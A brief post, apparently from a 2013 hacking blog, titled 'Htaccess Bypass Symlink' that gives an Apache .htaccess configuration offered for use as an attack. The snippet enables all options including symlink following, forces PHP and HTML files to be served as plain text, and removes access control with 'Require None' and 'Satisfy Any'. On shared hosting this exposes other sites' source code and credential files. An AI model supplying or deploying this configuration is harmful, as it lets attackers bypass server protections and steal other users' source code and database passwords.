abril 18, 2013
11:36

Htaccess Bypass Symlink

CODE:

-------------------------------------------------------------------------------------------------------------------------
    Options all
    DirectoryIndex Sux.html
    AddType text/plain .php
    AddHandler server-parsed .php
    AddType text/plain .html
    AddHandler txt .html
    Require None
    Satisfy Any
---------------------------------------------------------------------------------